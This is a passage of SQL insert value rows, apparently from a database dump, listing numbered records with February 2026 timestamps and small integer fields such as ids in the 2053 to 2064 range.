(25695, '2026-02-02 05:24:56', 1, 2054, 0, 1, 1),
(25696, '2026-02-02 08:44:23', 1, 2054, 0, 1, 1),
(25697, '2026-02-02 08:57:27', 1, 2059, 0, 1, 1),
(25698, '2026-02-02 11:21:53', 1, 2064, 0, 1, 1),
(25699, '2026-02-02 15:46:40', 1, 2064, 0, 1, 1),
(25700, '2026-02-02 16:32:15', 1, 2062, 0, 1, 1),
(25701, '2026-02-02 16:32:45', 1, 2062, 0, 1, 1),
(25702, '2026-02-02 16:40:53', 1, 2064, 0, 1, 1),
(25703, '2026-02-02 17:15:22', 1, 2061, 0, 1, 1),
(25704, '2026-02-02 17:37:18', 1, 2060, 0, 1, 1),
(25705, '2026-02-02 18:07:23', 1, 2064, 0, 1, 1),
(25706, '2026-02-02 18:08:09', 1, 2054, 0, 1, 1),
(25707, '2026-02-02 18:10:17', 1, 2055, 0, 1, 1),
(25708, '2026-02-02 18:10:37', 1, 2058, 0, 1, 1),
(25709, '2026-02-02 18:10:39', 1, 2059, 0, 1, 1),
(25710, '2026-02-02 18:13:21', 1, 2060, 0, 1, 1),
(25711, '2026-02-02 18:53:33', 1, 2054, 0, 1, 1),
(25712, '2026-02-02 18:54:35', 1, 2058, 0, 1, 1),
(25713, '2026-02-02 19:58:59', 1, 2054, 0, 1, 1),
(25714, '2026-02-02 19:59:06', 1, 2058, 0, 1, 1),
(25715, '2026-02-02 20:13:37', 1, 2064, 0, 1, 1),
(25716, '2026-02-02 21:53:21', 1, 2063, 0, 1, 1),
(25717, '2026-02-02 23:30:29', 1, 2061, 0, 1, 1),
(25718, '2026-02-03 00:03:18', 1, 2060, 0, 1, 1),
(25719, '2026-02-03 00:18:30', 1, 2054, 0, 1, 1),
(25720, '2026-02-03 02:44:12', 1, 2054, 0, 1, 1),
(25721, '2026-02-03 03:27:44', 1, 2054, 0, 1, 1),
(25722, '2026-02-03 04:13:59', 1, 2060, 0, 1, 1),
(25723, '2026-02-03 04:14:02', 1, 2060, 0, 1, 1),
(25724, '2026-02-03 04:38:45', 1, 2061, 0, 1, 1),
(25725, '2026-02-03 04:53:34', 1, 2060, 0, 1, 1),
(25726, '2026-02-03 04:53:36', 1, 2060, 0, 1, 1),
(25727, '2026-02-03 05:06:52', 1, 2064, 0, 1, 1),
(25728, '2026-02-03 05:19:14', 1, 2062, 0, 1, 1),
(25729, '2026-02-03 05:20:38', 1, 2064, 0, 1, 1),
(25730, '2026-02-03 05:33:02', 1, 2061, 0, 1, 1),
(25731, '2026-02-03 05:34:01', 1, 2062, 0, 1, 1),
(25732, '2026-02-03 05:36:04', 1, 2064, 0, 1, 1),
(25733, '2026-02-03 05:36:22', 1, 2055, 0, 1, 1),
(25734, '2026-02-03 05:38:24', 1, 2058, 0, 1, 1),
(25735, '2026-02-03 05:39:04', 1, 2060, 0, 1, 1),
(25736, '2026-02-03 05:40:50', 1, 2063, 0, 1, 1),
(25737, '2026-02-03 05:47:35', 1, 2053, 0, 1, 1),
(25738, '2026-02-03 05:55:01', 1, 2059, 0, 1, 1),
(25739, '2026-02-03 05:58:01', 1, 2064, 0, 1, 1),
(25740, '2026-02-03 05:58:46', 1, 2064, 0, 1, 1),
(25741, '2026-02-03 05:59:44', 1, 2054, 0, 1, 1),
(25742, '2026-02-03 06:40:54', 1, 2061, 0, 1, 1),
(25743, '2026-02-03 07:07:53', 1, 2054, 0, 1, 1),
(25744, '2026-02-03 09:28:19', 1, 2064, 0, 1, 1),
(25745, '2026-02-03 14:03:57', 1, 2060, 0, 1, 1),
(25746, '2026-02-03 14:11:25', 1, 2055, 0, 1, 1),
(25747, '2026-02-03 14:11:53', 1, 2054, 0, 1, 1),
(25748, '2026-02-03 14:12:11', 1, 2054, 0, 1, 1),
(25749, '2026-02-03 14:14:12', 1, 2055, 0, 1, 1),
(25750, '2026-02-03 15:51:46', 1, 2064, 0, 1, 1),
(25751, '2026-02-03 16:01:36', 1, 2064, 0, 1, 1),
(25752, '2026-02-03 16:01:36', 1, 2064, 0, 1, 1),
(25753, '2026-02-03 16:01:36', 1, 2064, 0, 1, 1),
(25754, '2026-02-03 16:01:37', 1, 2064, 0, 1, 1),
(25755, '2026-02-03 16:01:39', 1, 2064, 0, 1, 1),
(25756, '2026-02-03 16:01:42', 1, 2064, 0, 1, 1),
(25757, '2026-02-03 16:01:43', 1, 2064, 0, 1, 1),
(25758, '2026-02-03 16:01:45', 1, 2064, 0, 1, 1),
(25759, '2026-02-03 16:01:45', 1, 2064, 0, 1, 1),
(25760, '2026-02-03 16:01:45', 1, 2063, 0, 1, 1),
(25761, '2026-02-03 16:01:45', 1, 2062, 0, 1, 1),
(25762, '2026-02-03 16:01:45', 1, 2061, 0, 1, 1),
(25763, '2026-02-03 16:01:45', 1, 2060, 0, 1, 1),
(25764, '2026-02-03 16:01:46', 1, 2064, 0, 1, 1),
(25765, '2026-02-03 16:01:47', 1, 2064, 0, 1, 1),
(25766, '2026-02-03 16:01:47', 1, 2059, 0, 1, 1),
(25767, '2026-02-03 16:01:47', 1, 2058, 0, 1, 1),
(25768, '2026-02-03 16:01:48', 1, 2062, 0, 1, 1),
(25769, '2026-02-03 16:01:48', 1, 2061, 0, 1, 1),
(25770, '2026-02-03 16:01:48', 1, 2060, 0, 1, 1),
(25771, '2026-02-03 16:01:48', 1, 2064, 0, 1, 1),
(25772, '2026-02-03 16:01:48', 1, 2063, 0, 1, 1),
(25773, '2026-02-03 16:01:48', 1, 2055, 0, 1, 1),
(25774, '2026-02-03 16:01:50', 1, 2064, 0, 1, 1),
(25775, '2026-02-03 16:01:50', 1, 2063, 0, 1, 1),
(25776, '2026-02-03 16:01:50', 1, 2064, 0, 1, 1),
(25777, '2026-02-03 16:01:50', 1, 2061, 0, 1, 1),
(25778, '2026-02-03 16:01:50', 1, 2062, 0, 1, 1),
(25779, '2026-02-03 16:01:50', 1, 2060, 0, 1, 1),
(25780, '2026-02-03 16:01:50', 1, 2064, 0, 1, 1),
(25781, '2026-02-03 16:01:51', 1, 2058, 0, 1, 1),
(25782, '2026-02-03 16:01:52', 1, 2059, 0, 1, 1),
(25783, '2026-02-03 16:01:53', 1, 2058, 0, 1, 1),
(25784, '2026-02-03 16:01:53', 1, 2055, 0, 1, 1),
(25785, '2026-02-03 16:01:53', 1, 2064, 0, 1, 1),
(25786, '2026-02-03 16:01:53', 1, 2062, 0, 1, 1),
(25787, '2026-02-03 16:01:53', 1, 2063, 0, 1, 1),
(25788, '2026-02-03 16:01:53', 1, 2059, 0, 1, 1),
(25789, '2026-02-03 16:01:53', 1, 2061, 0, 1, 1),
(25790, '2026-02-03 16:01:53', 1, 2060, 0, 1, 1),
(25791, '2026-02-03 16:01:54', 1, 2055, 0, 1, 1),
(25792, '2026-02-03 16:01:54', 1, 2064, 0, 1, 1),
(25793, '2026-02-03 16:01:54', 1, 2062, 0, 1, 1),
(25794, '2026-02-03 16:01:55', 1, 2059, 0, 1, 1),
(25795, '2026-02-03 16:01:55', 1, 2060, 0, 1, 1),
(25796, '2026-02-03 16:01:55', 1, 2063, 0, 1, 1),
(25797, '2026-02-03 16:01:55', 1, 2061, 0, 1, 1),
(25798, '2026-02-03 16:01:55', 1, 2058, 0, 1, 1),
(25799, '2026-02-03 16:01:56', 1, 2055, 0, 1, 1),
(25800, '2026-02-03 16:01:56', 1, 2058, 0, 1, 1),
(25801, '2026-02-03 16:01:56', 1, 2059, 0, 1, 1),
(25802, '2026-02-03 16:01:56', 1, 2062, 0, 1, 1),
(25803, '2026-02-03 16:01:57', 1, 2063, 0, 1, 1),
(25804, '2026-02-03 16:01:57', 1, 2061, 0, 1, 1),
(25805, '2026-02-03 16:01:57', 1, 2064, 0, 1, 1),
(25806, '2026-02-03 16:01:57', 1, 2055, 0, 1, 1),
(25807, '2026-02-03 16:01:57', 1, 2060, 0, 1, 1),
(25808, '2026-02-03 16:01:58', 1, 2054, 0, 1, 1),
(25809, '2026-02-03 16:01:58', 1, 2059, 0, 1, 1),
(25810, '2026-02-03 16:01:59', 1, 2055, 0, 1, 1),
(25811, '2026-02-03 16:01:59', 1, 2058, 0, 1, 1),
(25812, '2026-02-03 16:02:00', 1, 2054, 0, 1, 1),
(25813, '2026-02-03 16:02:01', 1, 2054, 0, 1, 1),
(25814, '2026-02-03 16:02:01', 1, 2054, 0, 1, 1),
(25815, '2026-02-03 16:02:02', 1, 2054, 0, 1, 1),
(25816, '2026-02-03 16:02:03', 1, 2054, 0, 1, 1),
(25817, '2026-02-03 16:05:13', 1, 2063, 0, 1, 1),
(25818, '2026-02-03 16:05:14', 1, 2064, 0, 1, 1),
(25819, '2026-02-03 16:05:14', 1, 2064, 0, 1, 1),
(25820, '2026-02-03 16:05:14', 1, 2061, 0, 1, 1),
(25821, '2026-02-03 16:05:14', 1, 2062, 0, 1, 1),
(25822, '2026-02-03 16:05:14', 1, 2064, 0, 1, 1),
(25823, '2026-02-03 16:05:14', 1, 2060, 0, 1, 1),
(25824, '2026-02-03 16:05:15', 1, 2059, 0, 1, 1),
(25825, '2026-02-03 16:05:15', 1, 2058, 0, 1, 1),
(25826, '2026-02-03 16:36:49', 1, 2064, 0, 1, 1),
(25827, '2026-02-03 16:37:13', 1, 2062, 0, 1, 1),
(25828, '2026-02-03 17:01:59', 1, 2054, 0, 1, 1),
(25829, '2026-02-03 17:21:32', 1, 2061, 0, 1, 1),
(25830, '2026-02-03 17:32:39', 1, 2064, 0, 1, 1),
(25831, '2026-02-03 17:57:09', 1, 2064, 0, 1, 1),
(25832, '2026-02-03 20:51:10', 1, 2054, 0, 1, 1),
(25833, '2026-02-03 21:04:35', 1, 2064, 0, 1, 1),
(25834, '2026-02-03 21:05:10', 1, 2061, 0, 1, 1),
(25835, '2026-02-03 21:21:19', 1, 2061, 0, 1, 1),
(25836, '2026-02-04 04:21:26', 1, 2060, 0, 1, 1),
(25837, '2026-02-04 04:41:14', 1, 2054, 0, 1, 1),
(25838, '2026-02-04 05:33:52', 1, 2064, 0, 1, 1),
(25839, '2026-02-04 05:34:38', 1, 2061, 0, 1, 1),
(25840, '2026-02-04 05:37:07', 1, 2054, 0, 1, 1),
(25841, '2026-02-04 07:17:58', 1, 2060, 0, 1, 1),
(25842, '2026-02-04 09:21:04', 1, 2061, 0, 1, 1),
(25843, '2026-02-04 09:32:03', 1, 2061, 0, 1, 1),
(25844, '2026-02-04 10:13:18', 1, 2060, 0, 1, 1),
(25845, '2026-02-04 10:13:38', 1, 2060, 0, 1, 1),
(25846, '2026-02-04 10:14:32', 1, 2055, 0, 1, 1),
(25847, '2026-02-04 10:15:46', 1, 2054, 0, 1, 1),
(25848, '2026-02-04 11:05:02', 1, 2064, 0, 1, 1),
(25849, '2026-02-04 11:52:01', 1, 2064, 0, 1, 1),
(25850, '2026-02-04 11:54:56', 1, 2054, 0, 1, 1),
(25851, '2026-02-04 12:08:57', 1, 2061, 0, 1, 1),
(25852, '2026-02-04 15:22:27', 1, 2060, 0, 1, 1),
(25853, '2026-02-04 16:04:46', 1, 2054, 0, 1, 1),
(25854, '2026-02-04 16:43:57', 1, 2062, 0, 1, 1),
(25855, '2026-02-04 16:44:20', 1, 2062, 0, 1, 1),
(25856, '2026-02-04 17:41:10', 1, 2054, 0, 1, 1),
(25857, '2026-02-04 17:54:05', 1, 2062, 0, 1, 1),
(25858, '2026-02-04 17:54:26', 1, 2062, 0, 1, 1),
(25859, '2026-02-04 18:02:03', 1, 2059, 0, 1, 1),
(25860, '2026-02-04 18:57:08', 1, 2060, 0, 1, 1),
(25861, '2026-02-04 19:37:34', 1, 2060, 0, 1, 1),
(25862, '2026-02-04 22:47:47', 1, 2061, 0, 1, 1),
(25863, '2026-02-05 00:19:04', 1, 2064, 0, 1, 1),
(25864, '2026-02-05 02:34:16', 1, 2064, 0, 1, 1),
(25865, '2026-02-05 02:34:35', 1, 2062, 0, 1, 1),
(25866, '2026-02-05 02:35:18', 1, 2061, 0, 1, 1),
(25867, '2026-02-05 02:39:56', 1, 2054, 0, 1, 1),
(25868, '2026-02-05 04:21:24', 1, 2060, 0, 1, 1),
(25869, '2026-02-05 05:45:22', 1, 2060, 0, 1, 1),
(25870, '2026-02-05 05:45:25', 1, 2060, 0, 1, 1),
(25871, '2026-02-05 06:13:45', 1, 2060, 0, 1, 1),
(25872, '2026-02-05 06:14:56', 1, 2058, 0, 1, 1),
(25873, '2026-02-05 06:16:49', 1, 2055, 0, 1, 1),
(25874, '2026-02-05 06:17:50', 1, 2060, 0, 1, 1),
(25875, '2026-02-05 06:18:19', 1, 2054, 0, 1, 1),
(25876, '2026-02-05 06:18:21', 1, 2055, 0, 1, 1),
(25877, '2026-02-05 06:22:11', 1, 2060, 0, 1, 1),
(25878, '2026-02-05 06:22:14', 1, 2060, 0, 1, 1),
(25879, '2026-02-05 06:39:12', 1, 2064, 0, 1, 1),
(25880, '2026-02-05 07:21:04', 1, 2054, 0, 1, 1),
(25881, '2026-02-05 07:30:50', 1, 2061, 0, 1, 1),
(25882, '2026-02-05 09:39:39', 1, 2064, 0, 1, 1),
(25883, '2026-02-05 10:27:20', 1, 2064, 0, 1, 1),
(25884, '2026-02-05 10:27:21', 1, 2064, 0, 1, 1),
(25885, '2026-02-05 10:27:21', 1, 2064, 0, 1, 1),
(25886, '2026-02-05 10:27:21', 1, 2063, 0, 1, 1),
(25887, '2026-02-05 10:27:22', 1, 2061, 0, 1, 1),
(25888, '2026-02-05 10:27:22', 1, 2062, 0, 1, 1),
(25889, '2026-02-05 10:27:22', 1, 2060, 0, 1, 1),
(25890, '2026-02-05 10:27:24', 1, 2059, 0, 1, 1),
(25891, '2026-02-05 10:27:24', 1, 2064, 0, 1, 1),
(25892, '2026-02-05 10:27:24', 1, 2064, 0, 1, 1),
(25893, '2026-02-05 10:27:25', 1, 2058, 0, 1, 1),
(25894, '2026-02-05 10:27:25', 1, 2063, 0, 1, 1),
(25895, '2026-02-05 10:27:25', 1, 2062, 0, 1, 1),
(25896, '2026-02-05 10:27:25', 1, 2061, 0, 1, 1),
(25897, '2026-02-05 10:27:25', 1, 2060, 0, 1, 1),
(25898, '2026-02-05 10:27:27', 1, 2064, 0, 1, 1),
(25899, '2026-02-05 10:27:27', 1, 2062, 0, 1, 1),
(25900, '2026-02-05 10:27:27', 1, 2063, 0, 1, 1),
(25901, '2026-02-05 10:27:27', 1, 2064, 0, 1, 1),
(25902, '2026-02-05 10:27:27', 1, 2055, 0, 1, 1),
(25903, '2026-02-05 10:27:28', 1, 2059, 0, 1, 1),
(25904, '2026-02-05 10:27:28', 1, 2058, 0, 1, 1),
(25905, '2026-02-05 10:27:28', 1, 2060, 0, 1, 1),
(25906, '2026-02-05 10:27:29', 1, 2061, 0, 1, 1),
(25907, '2026-02-05 10:27:30', 1, 2059, 0, 1, 1),
(25908, '2026-02-05 10:27:30', 1, 2058, 0, 1, 1),
(25909, '2026-02-05 10:27:31', 1, 2064, 0, 1, 1),
(25910, '2026-02-05 10:27:31', 1, 2064, 0, 1, 1),
(25911, '2026-02-05 10:27:31', 1, 2062, 0, 1, 1),
(25912, '2026-02-05 10:27:31', 1, 2055, 0, 1, 1),
(25913, '2026-02-05 10:27:31', 1, 2063, 0, 1, 1),
(25914, '2026-02-05 10:27:32', 1, 2061, 0, 1, 1),
(25915, '2026-02-05 10:27:32', 1, 2060, 0, 1, 1),
(25916, '2026-02-05 10:27:33', 1, 2064, 0, 1, 1),
(25917, '2026-02-05 10:27:34', 1, 2064, 0, 1, 1),
(25918, '2026-02-05 10:27:34', 1, 2055, 0, 1, 1),
(25919, '2026-02-05 10:27:34', 1, 2063, 0, 1, 1),
(25920, '2026-02-05 10:27:34', 1, 2062, 0, 1, 1),
(25921, '2026-02-05 10:27:35', 1, 2059, 0, 1, 1),
(25922, '2026-02-05 10:27:35', 1, 2058, 0, 1, 1),
(25923, '2026-02-05 10:27:35', 1, 2061, 0, 1, 1),
(25924, '2026-02-05 10:27:35', 1, 2060, 0, 1, 1),
(25925, '2026-02-05 10:27:37', 1, 2058, 0, 1, 1),
(25926, '2026-02-05 10:27:37', 1, 2059, 0, 1, 1),
(25927, '2026-02-05 10:27:37', 1, 2064, 0, 1, 1),
(25928, '2026-02-05 10:27:37', 1, 2064, 0, 1, 1),
(25929, '2026-02-05 10:27:37', 1, 2063, 0, 1, 1),
(25930, '2026-02-05 10:27:38', 1, 2055, 0, 1, 1),
(25931, '2026-02-05 10:27:38', 1, 2062, 0, 1, 1),
(25932, '2026-02-05 10:27:38', 1, 2060, 0, 1, 1),
(25933, '2026-02-05 10:27:38', 1, 2061, 0, 1, 1),
(25934, '2026-02-05 10:27:40', 1, 2054, 0, 1, 1),
(25935, '2026-02-05 10:27:40', 1, 2055, 0, 1, 1),
(25936, '2026-02-05 10:27:41', 1, 2059, 0, 1, 1),
(25937, '2026-02-05 10:27:41', 1, 2058, 0, 1, 1),
(25938, '2026-02-05 10:27:42', 1, 2054, 0, 1, 1),
(25939, '2026-02-05 10:27:43', 1, 2055, 0, 1, 1),
(25940, '2026-02-05 10:27:45', 1, 2054, 0, 1, 1),
(25941, '2026-02-05 11:10:19', 1, 2064, 6582, 1, 1),
(25942, '2026-02-05 11:10:20', 1, 2064, 6582, 1, 1),
(25943, '2026-02-05 14:25:46', 1, 2061, 0, 1, 1),
(25944, '2026-02-05 14:54:33', 1, 2054, 0, 1, 1),
(25945, '2026-02-05 16:11:00', 1, 2059, 0, 1, 1),
(25946, '2026-02-05 17:34:07', 1, 2062, 0, 1, 1),
(25947, '2026-02-05 17:35:06', 1, 2062, 0, 1, 1),
(25948, '2026-02-05 18:03:03', 1, 2059, 0, 1, 1),
(25949, '2026-02-05 22:48:53', 1, 2061, 0, 1, 1),
(25950, '2026-02-05 22:48:56', 1, 2062, 0, 1, 1),
(25951, '2026-02-05 22:49:04', 1, 2063, 0, 1, 1),
(25952, '2026-02-06 00:54:49', 1, 2054, 0, 1, 1),
(25953, '2026-02-06 00:58:54', 1, 2061, 0, 1, 1),
(25954, '2026-02-06 01:27:46', 1, 2064, 0, 1, 1),
(25955, '2026-02-06 01:46:34', 1, 2053, 0, 1, 1),
(25956, '2026-02-06 02:08:22', 1, 2064, 0, 1, 1),
(25957, '2026-02-06 02:15:02', 1, 2054, 0, 1, 1),
(25958, '2026-02-06 02:15:51', 1, 2055, 0, 1, 1),
(25959, '2026-02-06 02:18:23', 1, 2058, 0, 1, 1),
(25960, '2026-02-06 02:18:28', 1, 2058, 0, 1, 1),
(25961, '2026-02-06 03:55:56', 1, 2061, 0, 1, 1),
(25962, '2026-02-06 05:09:14', 1, 2064, 0, 1, 1),
(25963, '2026-02-06 05:47:09', 1, 2058, 0, 1, 1),
(25964, '2026-02-06 05:48:12', 1, 2054, 0, 1, 1),
(25965, '2026-02-06 08:42:34', 1, 2058, 0, 1, 1),
(25966, '2026-02-06 08:46:37', 1, 2053, 0, 1, 1),
(25967, '2026-02-06 10:17:21', 1, 2061, 0, 1, 1),
(25968, '2026-02-06 10:17:23', 1, 2061, 0, 1, 1),
(25969, '2026-02-06 10:20:32', 1, 2061, 0, 1, 1),
(25970, '2026-02-06 10:21:46', 1, 2061, 0, 1, 1),
(25971, '2026-02-06 10:24:41', 1, 2061, 0, 1, 1),
(25972, '2026-02-06 10:27:19', 1, 2061, 0, 1, 1),
(25973, '2026-02-06 11:49:29', 1, 2055, 0, 1, 1),
(25974, '2026-02-06 12:29:11', 1, 2054, 0, 1, 1),
(25975, '2026-02-06 13:10:51', 1, 2064, 0, 1, 1),
(25976, '2026-02-06 13:41:42', 1, 2061, 0, 1, 1),
(25977, '2026-02-06 17:27:20', 1, 2054, 0, 1, 1),
(25978, '2026-02-06 17:30:30', 1, 2061, 0, 1, 1),
(25979, '2026-02-06 18:43:19', 1, 2064, 0, 1, 1),
(25980, '2026-02-06 18:51:02', 1, 2063, 0, 1, 1),
(25981, '2026-02-06 20:34:45', 1, 2062, 0, 1, 1),
(25982, '2026-02-06 21:43:35', 1, 2054, 0, 1, 1),
(25983, '2026-02-06 21:51:10', 1, 2064, 0, 1, 1),
(25984, '2026-02-06 22:20:04', 1, 2058, 0, 1, 1),
(25985, '2026-02-06 22:21:13', 1, 2055, 0, 1, 1),
(25986, '2026-02-06 22:23:48', 1, 2060, 0, 1, 1),
(25987, '2026-02-06 22:23:54', 1, 2054, 0, 1, 1),
(25988, '2026-02-06 22:24:13', 1, 2058, 0, 1, 1),
(25989, '2026-02-06 22:24:36', 1, 2054, 0, 1, 1),
(25990, '2026-02-06 22:25:05', 1, 2060, 0, 1, 1),
(25991, '2026-02-07 00:08:16', 1, 2059, 0, 1, 1),
(25992, '2026-02-07 00:22:59', 1, 2061, 0, 1, 1),
(25993, '2026-02-07 03:07:07', 1, 2064, 0, 1, 1),
(25994, '2026-02-07 03:22:24', 1, 2054, 0, 1, 1),
(25995, '2026-02-07 04:05:16', 1, 2053, 0, 1, 1),
(25996, '2026-02-07 05:46:06', 1, 2061, 0, 1, 1),
(25997, '2026-02-07 06:53:52', 1, 2059, 0, 1, 1),
(25998, '2026-02-07 06:53:55', 1, 2060, 0, 1, 1),
(25999, '2026-02-07 06:58:06', 1, 2060, 0, 1, 1),
(26000, '2026-02-07 06:58:08', 1, 2060, 0, 1, 1),
(26001, '2026-02-07 07:35:35', 1, 2060, 0, 1, 1),
(26002, '2026-02-07 07:35:38', 1, 2060, 0, 1, 1),
(26003, '2026-02-07 07:39:26', 1, 2061, 0, 1, 1),
(26004, '2026-02-07 08:52:32', 1, 2063, 0, 1, 1),
(26005, '2026-02-07 09:45:32', 1, 2061, 0, 1, 1),
(26006, '2026-02-07 10:02:34', 1, 2064, 0, 1, 1),
(26007, '2026-02-07 10:04:58', 1, 2064, 0, 1, 1),
(26008, '2026-02-07 10:51:34', 1, 2054, 0, 1, 1),
(26009, '2026-02-07 11:49:58', 1, 2061, 0, 1, 1),
(26010, '2026-02-07 14:41:38', 1, 2064, 0, 1, 1),
(26011, '2026-02-07 16:19:03', 1, 2064, 0, 1, 1),
(26012, '2026-02-07 16:48:38', 1, 2059, 0, 1, 1),
(26013, '2026-02-07 16:58:14', 1, 2062, 0, 1, 1),
(26014, '2026-02-07 16:59:04', 1, 2062, 0, 1, 1),
(26015, '2026-02-07 17:09:22', 1, 2061, 0, 1, 1),
(26016, '2026-02-07 17:59:39', 1, 2058, 0, 1, 1),
(26017, '2026-02-07 18:09:51', 1, 2061, 0, 1, 1),
(26018, '2026-02-07 18:19:33', 1, 2058, 0, 1, 1),
(26019, '2026-02-07 18:19:34', 1, 2058, 0, 1, 1),
(26020, '2026-02-07 18:23:04', 1, 2054, 0, 1, 1),
(26021, '2026-02-07 18:23:49', 1, 2060, 0, 1, 1),
(26022, '2026-02-07 20:32:23', 1, 2054, 0, 1, 1),
(26023, '2026-02-07 22:41:23', 1, 2062, 0, 1, 1),
(26024, '2026-02-07 23:00:55', 1, 2058, 0, 1, 1),
(26025, '2026-02-07 23:15:36', 1, 2059, 0, 1, 1),
(26026, '2026-02-08 00:27:50', 1, 2055, 0, 1, 1),
(26027, '2026-02-08 00:35:43', 1, 2054, 0, 1, 1),
(26028, '2026-02-08 01:01:17', 1, 2061, 0, 1, 1),
(26029, '2026-02-08 01:50:24', 1, 2053, 0, 1, 1),
(26030, '2026-02-08 02:15:41', 1, 2061, 0, 1, 1),
(26031, '2026-02-08 03:57:56', 1, 2064, 0, 1, 1),
(26032, '2026-02-08 04:36:31', 1, 2064, 0, 1, 1),
(26033, '2026-02-08 05:42:04', 1, 2054, 0, 1, 1),
(26034, '2026-02-08 06:47:59', 1, 2054, 0, 1, 1),
(26035, '2026-02-08 06:49:10', 1, 2053, 0, 1, 1),
(26036, '2026-02-08 07:11:24', 1, 2062, 0, 1, 1),
(26037, '2026-02-08 09:00:18', 1, 2064, 0, 1, 1),
(26038, '2026-02-08 10:35:54', 1, 2063, 0, 1, 1),
(26039, '2026-02-08 13:57:30', 1, 2061, 0, 1, 1),
(26040, '2026-02-08 14:24:00', 1, 2058, 0, 1, 1),
(26041, '2026-02-08 14:25:05', 1, 2060, 0, 1, 1),
(26042, '2026-02-08 14:26:17', 1, 2054, 0, 1, 1),
(26043, '2026-02-08 14:27:10', 1, 2055, 0, 1, 1),
(26044, '2026-02-08 14:28:09', 1, 2058, 0, 1, 1),
(26045, '2026-02-08 16:38:15', 1, 2062, 0, 1, 1),
(26046, '2026-02-08 16:38:48', 1, 2062, 0, 1, 1),
(26047, '2026-02-08 16:40:52', 1, 2054, 0, 1, 1),
(26048, '2026-02-08 16:59:26', 1, 2064, 0, 1, 1),
(26049, '2026-02-08 17:04:11', 1, 2063, 0, 1, 1),
(26050, '2026-02-08 17:08:34', 1, 2062, 0, 1, 1),
(26051, '2026-02-08 17:09:28', 1, 2062, 0, 1, 1),
(26052, '2026-02-08 17:49:12', 1, 2054, 0, 1, 1),
(26053, '2026-02-08 19:22:15', 1, 2064, 0, 1, 1),
(26054, '2026-02-08 20:23:35', 1, 2061, 0, 1, 1),
(26055, '2026-02-08 21:54:16', 1, 2053, 0, 1, 1),
(26056, '2026-02-08 22:18:46', 1, 2064, 0, 1, 1),
(26057, '2026-02-08 23:34:58', 1, 2061, 0, 1, 1),
(26058, '2026-02-08 23:36:19', 1, 2061, 0, 1, 1),
(26059, '2026-02-09 00:30:13', 1, 2061, 0, 1, 1),
(26060, '2026-02-09 01:12:32', 1, 2064, 0, 1, 1),
(26061, '2026-02-09 01:24:22', 1, 2064, 0, 1, 1),
(26062, '2026-02-09 02:34:38', 1, 2062, 0, 1, 1),
(26063, '2026-02-09 06:13:52', 1, 2060, 0, 1, 1),
(26064, '2026-02-09 10:26:05', 1, 2054, 0, 1, 1),
(26065, '2026-02-09 10:26:36', 1, 2054, 0, 1, 1),
(26066, '2026-02-09 10:27:49', 1, 2054, 0, 1, 1),
(26067, '2026-02-09 10:27:49', 1, 2060, 0, 1, 1),
(26068, '2026-02-09 10:28:03', 1, 2058, 0, 1, 1),
(26069, '2026-02-09 10:28:45', 1, 2060, 0, 1, 1),
(26070, '2026-02-09 10:30:10', 1, 2055, 0, 1, 1),
(26071, '2026-02-09 10:30:20', 1, 2058, 0, 1, 1),
(26072, '2026-02-09 10:35:12', 1, 2060, 0, 1, 1),
(26073, '2026-02-09 10:35:14', 1, 2060, 0, 1, 1),
(26074, '2026-02-09 11:11:51', 1, 2060, 0, 1, 1),
(26075, '2026-02-09 11:11:53', 1, 2060, 0, 1, 1),
(26076, '2026-02-09 13:00:16', 1, 2060, 0, 1, 1),
(26077, '2026-02-09 14:13:51', 1, 2061, 0, 1, 1),
(26078, '2026-02-09 14:21:05', 1, 2060, 0, 1, 1),
(26079, '2026-02-09 15:46:22', 1, 2061, 0, 1, 1),
(26080, '2026-02-09 16:45:32', 1, 2062, 0, 1, 1),
(26081, '2026-02-09 16:46:20', 1, 2062, 0, 1, 1),
(26082, '2026-02-09 17:57:41', 1, 2062, 0, 1, 1),
(26083, '2026-02-09 17:58:32', 1, 2062, 0, 1, 1),
(26084, '2026-02-09 18:17:45', 1, 2055, 0, 1, 1),
(26085, '2026-02-09 18:49:59', 1, 2061, 0, 1, 1),
(26086, '2026-02-09 18:50:07', 1, 2055, 0, 1, 1),
(26087, '2026-02-09 18:50:16', 1, 2054, 0, 1, 1),
(26088, '2026-02-09 18:50:21', 1, 2060, 0, 1, 1),
(26089, '2026-02-09 18:50:23', 1, 2064, 0, 1, 1),
(26090, '2026-02-09 18:50:26', 1, 2058, 0, 1, 1),
(26091, '2026-02-09 18:50:28', 1, 2059, 0, 1, 1),
(26092, '2026-02-09 18:50:31', 1, 2053, 0, 1, 1),
(26093, '2026-02-09 18:50:34', 1, 2062, 0, 1, 1),
(26094, '2026-02-09 19:48:06', 1, 2064, 0, 1, 1),
(26095, '2026-02-09 19:57:41', 1, 2058, 0, 1, 1),
(26096, '2026-02-09 19:57:44', 1, 2054, 0, 1, 1),
(26097, '2026-02-09 20:54:34', 1, 2064, 0, 1, 1),
(26098, '2026-02-09 21:01:42', 1, 2061, 0, 1, 1),
(26099, '2026-02-09 22:14:33', 1, 2058, 0, 1, 1),
(26100, '2026-02-10 00:18:18', 1, 2061, 0, 1, 1),
(26101, '2026-02-10 01:23:03', 1, 2061, 0, 1, 1),
(26102, '2026-02-10 03:03:47', 1, 2060, 0, 1, 1),
(26103, '2026-02-10 04:10:16', 1, 2063, 0, 1, 1),
(26104, '2026-02-10 04:14:52', 1, 2062, 0, 1, 1),
(26105, '2026-02-10 04:57:19', 1, 2064, 0, 1, 1),
(26106, '2026-02-10 06:24:39', 1, 2061, 0, 1, 1),
(26107, '2026-02-10 06:28:42', 1, 2054, 0, 1, 1),
(26108, '2026-02-10 06:30:51', 1, 2054, 0, 1, 1),
(26109, '2026-02-10 06:30:51', 1, 2058, 0, 1, 1),
(26110, '2026-02-10 06:31:10', 1, 2058, 0, 1, 1),
(26111, '2026-02-10 06:31:59', 1, 2060, 0, 1, 1),
(26112, '2026-02-10 06:32:00', 1, 2060, 0, 1, 1),
(26113, '2026-02-10 06:32:02', 1, 2055, 0, 1, 1),
(26114, '2026-02-10 06:32:52', 1, 2061, 0, 1, 1),
(26115, '2026-02-10 06:44:53', 1, 2060, 0, 1, 1),
(26116, '2026-02-10 08:49:00', 1, 2064, 0, 1, 1),
(26117, '2026-02-10 09:28:30', 1, 2064, 0, 1, 1),
(26118, '2026-02-10 10:21:55', 1, 2060, 0, 1, 1),
(26119, '2026-02-10 12:00:30', 1, 2061, 0, 1, 1),
(26120, '2026-02-10 13:39:51', 1, 2060, 0, 1, 1),
(26121, '2026-02-10 13:41:22', 1, 2064, 0, 1, 1),
(26122, '2026-02-10 16:32:37', 1, 2058, 0, 1, 1),
